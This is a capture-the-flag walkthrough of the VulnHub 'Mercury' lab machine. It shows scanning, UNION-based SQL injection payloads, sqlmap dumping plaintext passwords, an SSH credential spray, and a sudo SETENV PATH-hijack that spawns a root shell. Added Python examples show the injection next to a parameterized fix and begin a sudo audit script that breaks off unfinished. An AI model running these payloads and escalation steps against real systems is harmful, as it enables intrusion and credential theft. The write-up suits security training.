[vulnhub] The Planets: Mercury


Information Gathering

Host discovery, port scan, service detection, TCP scan, OS detection, vulnerability scan.

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:21 CST
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00011s latency).
MAC Address: 08:00:27:17:F0:4B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.00016s latency).
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.95 seconds

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.103
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:22 CST
Nmap scan report for 192.168.56.103
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,8080 192.168.56.103
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:23 CST
Nmap scan report for 192.168.56.103
Host is up (0.00041s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c824ea2a2bf13cfa169465bdc79b6c29 (RSA)
| 256 e808a18e7d5abc5c66164824570dfab8 (ECDSA)
|_ 256 2f187e1054f7b917a2111d8fb330a52a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Tue, 23 May 2023 13:23:21 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 23 May 2023 13:23:21 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.103
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:29 CST
Stats: 0:07:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.48% done; ETC: 21:36 (0:00:07 remaining)
Nmap scan report for 192.168.56.103
Host is up (0.00026s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 522.27 seconds

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nikto -h http://192.168.56.103:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: 192.168.56.103
+ Target Port: 8080
+ Start Time: 2023-05-23 21:38:54 (GMT8)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /SilverStream: SilverStream allows directory listing. See: https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html
+ /static/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ 8103 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2023-05-23 21:46:40 (GMT8) (466 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Only ports 22 and 8080 are open, and the vulnerability scan turned up nothing useful.

Run a quick web directory discovery.

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo dirb http://192.168.56.103:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 24 15:41:43 2023
URL_BASE: http://192.168.56.103:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.103:8080/ ----
+ http://192.168.56.103:8080/robots.txt (CODE:200|SIZE:26)
-----------------
END_TIME: Wed May 24 15:42:18 2023
DOWNLOADED: 4612 - FOUND: 1

Only robots.txt was found, and it contains nothing useful.
Then run feroxbuster with -x php,txt,asp,zip in the background to make sure directory discovery has not missed anything important.
But there is no point sitting idle, so we try some manual discovery, and happily the 404 page's error message gives us useful information.
[screenshot: 404pg.png]
The Django error page tells us there is a directory mercuryfacts/.
So let's take a look.
[screenshot: mercury.png]
The two links at the bottom are worth checking.
Look at todo first.
[screenshot: todo-remain-us-something.png]
Two useful pieces of information: the table used for authentication is very likely 'users', and the current MySQL queries are written directly in Python rather than through Django, so a SQL injection vulnerability is very likely.
The question is where the SQLi is; no rush, let's look at the other page first.
[screenshot: normalpapge.png]
The 1 in this URL looks very much like a query parameter and is probably the weak spot; try appending a single quote.
[screenshot: SQLi-found.png]
OK, not only is there a SQL injection vulnerability, there is also a very detailed error message. Time to get to work.

Exploit

Manual SQLi

First, the manual method.

  1. First use ORDER BY to guess the number of columns.

[screenshot: orderby-1.png]
Really just 1 column?
[screenshot: orderby-2.png]
OK, really just 1 column.

  2. Once the column count is known we can UNION SELECT.

First use UNION SELECT database() to get the database name.
[screenshot: UNION_SELECT_db.png]
Then use UNION SELECT group_concat(table_name) from information_schema.tables where table_schema=database() to get the table names. Note that querying from information_schema.tables alone only returns the table names of the default database, not those of the mercury database; we have to specify the database ourselves with where table_schema=database().
[screenshot: UNION_SELECT_tables.png]
Next, UNION SELECT group_concat(column_name) from information_schema.columns where table_name='users' to get the column names. A small trick: if single quotes are filtered, the table name can be written as a hex literal to bypass the filter.
[screenshot: UNION-col.png]
With everything in hand, query the data we want directly: UNION SELECT group_concat(id,0x7c,username,0x7c,password) from users. 0x7c is the hex value of '|'; we add it only to separate the fields in the result.
[screenshot: union-getuser.png]
The results are out.
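The bug behind the manual method above, the id pasted straight into the SQL text, reproduced as an added example (not the box's code) against a constructed in-memory SQLite stand-in for the MySQL backend: the ORDER BY column probe, the single-column UNION payload, and the parameterized query that makes the same payload inert. Table and column names follow the page's dump; all values are made up.

```python
import sqlite3

# Constructed stand-in for the box's "mercury" MySQL database: same shape as the
# page's dump (facts looked up by id, a users table), but the values are made up.
SCHEMA = """
CREATE TABLE facts(id INTEGER PRIMARY KEY, fact TEXT);
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO facts VALUES (1, 'Mercury is the closest planet to the Sun');
INSERT INTO facts VALUES (2, 'Mercury has no moons');
INSERT INTO users VALUES (1, 'john', 'constructed-pw-1');
INSERT INTO users VALUES (2, 'webmaster', 'constructed-pw-2');
"""

# The page's final payload, with SQLite's '|' in place of MySQL's 0x7c literal.
UNION_PAYLOAD = ("1 UNION SELECT group_concat(id || '|' || username || '|' || password)"
                 " FROM users")


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def fact_vulnerable(con, fact_id):
    """The pattern the todo page hints at: the URL segment is pasted into the SQL
    text, so the database parses whatever syntax the client supplied."""
    sql = "SELECT fact FROM facts WHERE id = " + fact_id
    return [row[0] for row in con.execute(sql)]


def fact_parameterized(con, fact_id):
    """Hardened form: validate the id, then bind it as a parameter so the value
    is never parsed as SQL. An injection string is simply an invalid id."""
    try:
        wanted = int(fact_id)
    except ValueError:
        return []
    rows = con.execute("SELECT fact FROM facts WHERE id = ?", (wanted,))
    return [row[0] for row in rows]


def probe_column_count(con, max_cols=5):
    """Step 1 of the manual method on the vulnerable endpoint: ORDER BY n fails
    once n exceeds the number of selected columns, so the last good n is the
    column count a UNION SELECT has to match."""
    for n in range(1, max_cols + 1):
        try:
            fact_vulnerable(con, "1 ORDER BY %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


if __name__ == "__main__":
    db = make_db()
    print("columns:", probe_column_count(db))
    print("vulnerable:", fact_vulnerable(db, UNION_PAYLOAD))
    print("parameterized:", fact_parameterized(db, UNION_PAYLOAD))
```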

SQLMAP

sqlmap also works, and is fast.

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ --dbs

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ -D mercury --tables

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ -D mercury -T users --columns

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ -D mercury -T users --dump

We save the results to a file and, with a bit of processing, split them into two txt files for the later SSH login attempt.

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata
+----+-------------------------------+-----------+
| id | password | username |
+----+-------------------------------+-----------+
| 1 | johnny1987 | john |
| 2 | lovemykids111 | laura |
| 3 | lovemybeer111 | sam |
| 4 | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata | awk -F '|' '{print $3}'

password

johnny1987
lovemykids111
lovemybeer111
mercuryisthesizeof0.056Earths

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata | awk -F '|' '{print $3}' > pass.txt

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata | awk -F '|' '{print $4}' > username.txt
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo crackmapexec ssh 192.168.56.103 -u username.txt -p pass.txt --continue-on-success
[sudo] password for kali:
SSH 192.168.56.103 22 192.168.56.103 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
SSH 192.168.56.103 22 192.168.56.103 [-] john:johnny1987 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] john:lovemykids111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] john:lovemybeer111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] john:mercuryisthesizeof0.056Earths Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] john: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] john: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] laura:johnny1987 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] laura:lovemykids111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] laura:lovemybeer111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] laura:mercuryisthesizeof0.056Earths Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] laura: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] laura: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] sam:johnny1987 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] sam:lovemykids111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] sam:lovemybeer111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] sam:mercuryisthesizeof0.056Earths Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] sam: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] sam: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] webmaster:johnny1987 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] webmaster:lovemykids111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] webmaster:lovemybeer111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [+] webmaster:mercuryisthesizeof0.056Earths
SSH 192.168.56.103 22 192.168.56.103 [-] webmaster: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] webmaster: Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] :johnny1987 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] :lovemykids111 Authentication failed.
SSH 192.168.56.103 22 192.168.56.103 [-] :lovemybeer111 Authentication failed.
^C

[*] Shutting down, please wait...

A working credential was found; no need to wait for the run to finish, just log in.

Priv Esc

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ ssh webmaster@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
webmaster@192.168.56.103's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 23 May 17:02:38 UTC 2023

System load: 0.0 Processes: 106
Usage of /: 74.9% of 4.86GB Users logged in: 0
Memory usage: 30% IPv4 address for enp0s3: 192.168.56.103
Swap usage: 0%


22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$ whoami
webmaster
webmaster@mercury:~$ pwd
/home/webmaster
webmaster@mercury:~/mercury_proj$ sudo -l
[sudo] password for webmaster:
Sorry, user webmaster may not run sudo on mercury.
webmaster@mercury:~$ ls -la
total 36
drwx------ 4 webmaster webmaster 4096 Sep 2 2020 .
drwxr-xr-x 5 root root 4096 Aug 28 2020 ..
lrwxrwxrwx 1 webmaster webmaster 9 Sep 1 2020 .bash_history -> /dev/null
-rw-r--r-- 1 webmaster webmaster 220 Aug 27 2020 .bash_logout
-rw-r--r-- 1 webmaster webmaster 3771 Aug 27 2020 .bashrc
drwx------ 2 webmaster webmaster 4096 Aug 27 2020 .cache
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 mercury_proj
-rw-r--r-- 1 webmaster webmaster 807 Aug 27 2020 .profile
-rw-rw-r-- 1 webmaster webmaster 75 Sep 1 2020 .selected_editor
-rw------- 1 webmaster webmaster 45 Sep 1 2020 user_flag.txt
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]

Got the user flag.

webmaster@mercury:~$ cat .bash_history 
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -la
total 28
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 .
drwx------ 4 webmaster webmaster 4096 Sep 2 2020 ..
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4096 Sep 1 2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4096 Aug 28 2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4096 Aug 28 2020 mercury_proj
-rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mercury:x:1000:1000:mercury:/home/mercury:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
linuxmaster:x:1002:1002:,,,:/home/linuxmaster:/bin/bash

First check the bash history: empty. Then look at what is under the web project directory: there is a notes.txt. Inspecting it, it seems to hold a base64-encoded login credential for linuxmaster. We cat /etc/passwd to confirm that the user really exists, then decode it with echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d and try logging in.

webmaster@mercury:~/mercury_proj$ su linuxmaster
Password:
linuxmaster@mercury:/home/webmaster/mercury_proj$ sudo -l
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
(root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/home/webmaster/mercury_proj$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:/home/webmaster/mercury_proj$ ls -la /usr/bin/check_syslog.sh
-rwxr-xr-x 1 root root 39 Aug 28 2020 /usr/bin/check_syslog.sh

The login succeeds. sudo -l shows that this user can run /usr/bin/check_syslog.sh as root without a password and with the SETENV tag. Looking at check_syslog.sh, it just uses tail to view the system log.
Notably, tail here is invoked by a relative name rather than an absolute path, so when the script runs the system looks it up through PATH. Since this user happens to have SETENV, the escalation route is clear: we forge a tail, put its directory at the front of PATH (the lookup goes front to back), and that way the command we choose runs with root privileges.

linuxmaster@mercury:/tmp$ echo '/bin/bash -p' > tail
linuxmaster@mercury:/tmp$ chmod +xs tail
linuxmaster@mercury:/tmp$ ls -la
total 48
drwxrwxrwt 10 root root 4096 May 23 17:10 .
drwxr-xr-x 19 root root 4096 Sep 1 2020 ..
-rwxr-xr-x 1 linuxmaster linuxmaster 39 May 23 17:05 backup
drwxrwxrwt 2 root root 4096 May 23 13:14 .font-unix
drwxrwxrwt 2 root root 4096 May 23 13:14 .ICE-unix
drwx------ 3 root root 4096 May 23 13:14 systemd-private-1295227d0ee948c7b42b8e747d46283d-systemd-logind.service-Pum4tf
drwx------ 3 root root 4096 May 23 13:14 systemd-private-1295227d0ee948c7b42b8e747d46283d-systemd-resolved.service-OBDWgg
drwx------ 3 root root 4096 May 23 13:14 systemd-private-1295227d0ee948c7b42b8e747d46283d-systemd-timesyncd.service-mA1HTi
-rwsrwsr-x 1 linuxmaster linuxmaster 13 May 23 17:10 tail
drwxrwxrwt 2 root root 4096 May 23 13:14 .Test-unix
drwxrwxrwt 2 root root 4096 May 23 13:14 .X11-unix
drwxrwxrwt 2 root root 4096 May 23 13:14 .XIM-unix
linuxmaster@mercury:/tmp$ export PATH=/tmp:$PATH
linuxmaster@mercury:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:/tmp$ sudo PATH=$PATH /usr/bin/check_syslog.sh
root@mercury:/tmp# whoami
root
root@mercury:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:80:e5:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 584sec preferred_lft 584sec
inet6 fe80::a00:27ff:fe80:e5a9/64 scope link
valid_lft forever preferred_lft forever
root@mercury:/tmp# uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@mercury:/tmp# exit
exit
linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
root@mercury:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@mercury:/tmp# cd ~
root@mercury:~# ls -la
total 56
drwx------ 5 root root 4096 Sep 2 2020 .
drwxr-xr-x 19 root root 4096 Sep 1 2020 ..
-rw------- 1 root root 3214 May 23 17:14 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4096 Aug 27 2020 .cache
-rw------- 1 root root 34 Sep 1 2020 .lesshst
drwxr-xr-x 3 root root 4096 Aug 28 2020 .local
-rw------- 1 root root 3619 Sep 1 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 1228 Sep 2 2020 root_flag.txt
drwx------ 2 root root 4096 Aug 27 2020 .ssh
-rw------- 1 root root 9454 Sep 2 2020 .viminfo
root@mercury:~# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
root@mercury:~#

From the steps above we can see that with SETENV, either sudo PATH=$PATH /usr/bin/check_syslog.sh or sudo --preserve-env=PATH /usr/bin/check_syslog.sh forces the script to run with the current user's PATH.
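The two conditions that made this escalation work, a SETENV tag on the sudo rule and a permitted script that resolves a command through PATH, are what an audit should look for. The following is an added example (not part of the original write-up or the box) that parses a sudo -l command line of the form shown above and lists the bare command names a script would look up through PATH; the builtin list and the rule regex are assumptions that cover the common cases, not a full shell parser.

```python
import re
import shlex

# Words the shell resolves itself rather than through PATH (subset; assumption).
SHELL_BUILTINS = {
    "if", "then", "else", "elif", "fi", "for", "while", "do", "done", "case",
    "esac", "cd", "echo", "exit", "export", "set", "test", "[", "return", "true",
    "false", "local", "read", "shift", "unset",
}

# One 'sudo -l' command line: "(runas) TAG: TAG: /path/to/command args".
SUDO_RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<command>\S.*)$")


def unqualified_commands(script_text):
    """Return, in order of first use, every command a shell script invokes by bare
    name. Each of these is found through PATH at run time, which is exactly what
    a caller with SETENV gets to control."""
    found = []
    for raw in script_text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drops comments and the shebang
        if not line:
            continue
        for segment in re.split(r"\|\||&&|[|;]", line):
            try:
                words = shlex.split(segment)
            except ValueError:                    # unbalanced quotes: skip it
                continue
            while words and re.match(r"^[A-Za-z_]\w*=", words[0]):
                words.pop(0)                      # leading VAR=value assignments
            if not words:
                continue
            cmd = words[0]
            if cmd in SHELL_BUILTINS or cmd.startswith(("/", "./", "../")):
                continue
            if cmd not in found:
                found.append(cmd)
    return found


def parse_sudo_rule(line):
    """Parse one 'sudo -l' line such as '(root : root) SETENV: /usr/bin/x.sh'."""
    m = SUDO_RULE_RE.match(line.strip())
    if not m:
        raise ValueError("not a sudo -l command line: %r" % line)
    tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
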